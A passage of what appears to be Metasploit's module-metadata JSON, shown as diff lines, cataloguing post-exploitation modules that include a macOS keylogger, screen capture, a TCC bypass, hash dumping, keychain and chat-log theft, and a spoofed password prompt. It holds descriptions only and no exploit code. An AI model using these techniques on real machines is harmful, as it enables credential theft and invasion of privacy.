"AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/local_exploit_suggester.rb", - "is_install_path": true, - "ref_name": "multi/recon/local_exploit_suggester", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/multiport_egress_traffic": { - "name": "Generate TCP/UDP Outbound Traffic On Multiple Ports", - "fullname": "post/multi/recon/multiport_egress_traffic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", - "is_install_path": true, - "ref_name": "multi/recon/multiport_egress_traffic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/reverse_lookup": { - "name": "Reverse Lookup IP Addresses", - "fullname": "post/multi/recon/reverse_lookup", - "aliases": [ - "post/windows/gather/reverse_lookup", - "post/windows/recon/resolve_ip" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module reverse resolves an IP address or IP address range to hostnames.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-05 13:18:35 +0000", - "path": "/modules/post/multi/recon/reverse_lookup.rb", - "is_install_path": true, - "ref_name": "multi/recon/reverse_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/recon/sudo_commands": { - "name": "Sudo Commands", - "fullname": "post/multi/recon/sudo_commands", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/recon/sudo_commands.rb", - "is_install_path": true, - "ref_name": "multi/recon/sudo_commands", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/sap/smdagent_get_properties": { - "name": "Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server", - "fullname": "post/multi/sap/smdagent_get_properties", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Yvan Genuer", - "Vladimir Ivanov" - ], - "description": "This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials\n used by the SMDAgent to connect to the SAP Solution Manager server.", - "references": [ - "CVE-2019-0307", - "URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf" - ], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/sap/smdagent_get_properties.rb", - "is_install_path": true, - "ref_name": "multi/sap/smdagent_get_properties", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_brocade": { - "name": "Brocade Gather Device General Information", - "fullname": "post/networking/gather/enum_brocade", - "aliases": [ - "post/brocade/gather/enum_brocade" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects Brocade device information and configuration.\n This module has been tested against an icx6430 running 08.0.20T311.", - "references": [], - "platform": "Brocade", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:13:25 +0000", - "path": "/modules/post/networking/gather/enum_brocade.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_brocade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_cisco": { - "name": "Cisco Gather Device General Information", - "fullname": "post/networking/gather/enum_cisco", - "aliases": [ - "post/cisco/gather/enum_cisco" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module collects a Cisco IOS or NXOS device information and configuration.", - "references": [], - "platform": "Cisco", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_cisco.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_cisco", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_f5": { - "name": "F5 Gather Device General Information", - "fullname": "post/networking/gather/enum_f5", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects a F5's device information and configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_f5.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_f5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_juniper": { - "name": "Juniper Gather Device General Information", - "fullname": "post/networking/gather/enum_juniper", - "aliases": [ - "post/juniper/gather/enum_juniper" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.", - "references": [], - "platform": "Juniper", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:13:25 +0000", - "path": "/modules/post/networking/gather/enum_juniper.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_juniper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_mikrotik": { - "name": "Mikrotik Gather Device General Information", - "fullname": "post/networking/gather/enum_mikrotik", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects Mikrotik device information and configuration.\n This module has been tested against RouterOS 6.45.9.", - "references": [], - "platform": "Mikrotik", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_mikrotik.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_mikrotik", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_networking/gather/enum_vyos": { - "name": "VyOS Gather Device General Information", - "fullname": "post/networking/gather/enum_vyos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module collects VyOS device information and configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/networking/gather/enum_vyos.rb", - "is_install_path": true, - "ref_name": "networking/gather/enum_vyos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/admin/say": { - "name": "OS X Text to Speech Utility", - "fullname": "post/osx/admin/say", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.", - "references": [ - "URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/admin/say.rb", - "is_install_path": true, - "ref_name": "osx/admin/say", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "audio-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/capture/keylog_recorder": { - "name": "OSX Capture Userspace Keylogger", - "fullname": "post/osx/capture/keylog_recorder", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/capture/keylog_recorder.rb", - "is_install_path": true, - "ref_name": "osx/capture/keylog_recorder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/capture/screen": { - "name": "OSX Screen Capture", - "fullname": "post/osx/capture/screen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth " - ], - "description": "This module takes screenshots of target desktop and automatically downloads them.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/capture/screen.rb", - "is_install_path": true, - "ref_name": "osx/capture/screen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/escalate/tccbypass": { - "name": "Bypass the macOS TCC Framework", - "fullname": "post/osx/escalate/tccbypass", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mattshockl", - "timwr" - ], - "description": "This module exploits a vulnerability in the TCC daemon on macOS Catalina\n (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be\n manipulated (by setting the HOME environment variable) to use a new user\n controlled location as the TCC database. We can then grant ourselves\n entitlements by inserting them into this new database.", - "references": [ - "CVE-2020-9934", - "URL-https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8", - "URL-https://github.com/mattshockl/CVE-2020-9934" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/osx/escalate/tccbypass.rb", - "is_install_path": true, - "ref_name": "osx/escalate/tccbypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/apfs_encrypted_volume_passwd": { - "name": "Mac OS X APFS Encrypted Volume Password Disclosure", - "fullname": "post/osx/gather/apfs_encrypted_volume_passwd", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-21", - "type": "post", - "author": [ - "Sarah Edwards", - "cbrnrd" - ], - "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.", - "references": [ - "URL-https://thehackernews.com/2018/03/macos-apfs-password.html", - "URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp" - ], - "platform": "OSX", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", - "is_install_path": true, - "ref_name": "osx/gather/apfs_encrypted_volume_passwd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/autologin_password": { - "name": "OSX Gather Autologin Password as Root", - "fullname": "post/osx/gather/autologin_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.", - "references": [ - "URL-https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/autologin_password.rb", - "is_install_path": true, - "ref_name": "osx/gather/autologin_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_adium": { - "name": "OS X Gather Adium Enumeration", - "fullname": "post/osx/gather/enum_adium", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_adium.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_adium", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ACCOUNTS", - "description": "Collect account-related plists" - }, - { - "name": "ALL", - "description": "Collect both account plists and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - } - ] - }, - "post_osx/gather/enum_airport": { - "name": "OS X Gather Airport Wireless Preferences", - "fullname": "post/osx/gather/enum_airport", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_airport.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_airport", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_chicken_vnc_profile": { - "name": "OS X Gather Chicken of the VNC Profile", - "fullname": "post/osx/gather/enum_chicken_vnc_profile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_chicken_vnc_profile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_colloquy": { - "name": "OS X Gather Colloquy Enumeration", - "fullname": "post/osx/gather/enum_colloquy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_colloquy.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_colloquy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ACCOUNTS", - "description": "Collect the preferences plists" - }, - { - "name": "ALL", - "description": "Collect both the plists and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - } - ] - }, - "post_osx/gather/enum_keychain": { - "name": "OS X Gather Keychain Enumeration", - "fullname": "post/osx/gather/enum_keychain", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ipwnstuff ", - "joev " - ], - "description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/osx/gather/enum_keychain.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_keychain", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_osx/gather/enum_messages": { - "name": "OS X Gather Messages", - "fullname": "post/osx/gather/enum_messages", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Geckom " - ], - "description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_messages.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_messages", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ALL", - "description": "Collect all Messages data" - }, - { - "name": "DBFILE", - "description": "Collect Messages DB file" - }, - { - "name": "LATEST", - "description": "Collect the latest message" - }, - { - "name": "READABLE", - "description": "Collect Messages DB and download in a readable format" - } - ] - }, - "post_osx/gather/enum_osx": { - "name": "OS X Gather Mac OS X System Information Enumeration", - "fullname": "post/osx/gather/enum_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_osx.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/gitignore": { - "name": "Git Ignore Retriever", - "fullname": "post/osx/gather/gitignore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "N!ght Jmp" - ], - "description": "This module finds potentially sensitive items by finding .gitignore files.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/osx/gather/gitignore.rb", - "is_install_path": true, - "ref_name": "osx/gather/gitignore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/hashdump": { - "name": "OS X Gather Mac OS X Password Hash Collector", - "fullname": "post/osx/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "hammackj ", - "joev " - ], - "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "osx/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/password_prompt_spoof": { - "name": "OSX Password Prompt Spoof", - "fullname": "post/osx/gather/password_prompt_spoof", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joff Thyer ", - "joev ", - "Peter Toth " - ], - "description": "Presents a password prompt dialog to a logged-in OSX user.", - "references": [ - "URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/password_prompt_spoof.rb", - "is_install_path": true, - "ref_name": "osx/gather/password_prompt_spoof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/safari_lastsession": { - "name": "OSX Gather Safari LastSession.plist", - "fullname": "post/osx/gather/safari_lastsession", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.", - "references": [ - "URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/safari_lastsession.rb", - "is_install_path": true, - "ref_name": "osx/gather/safari_lastsession", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/vnc_password_osx": { - "name": "OS X Display Apple VNC Password", - "fullname": "post/osx/gather/vnc_password_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kevin Gonzalvo " - ], - "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/vnc_password_osx.rb", - "is_install_path": true, - "ref_name": "osx/gather/vnc_password_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/manage/mount_share": { - "name": "OSX Network Share Mounter", - "fullname": "post/osx/manage/mount_share", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth ", - "joev " - ], - "description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/mount_share.rb", - "is_install_path": true, - "ref_name": "osx/manage/mount_share", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - 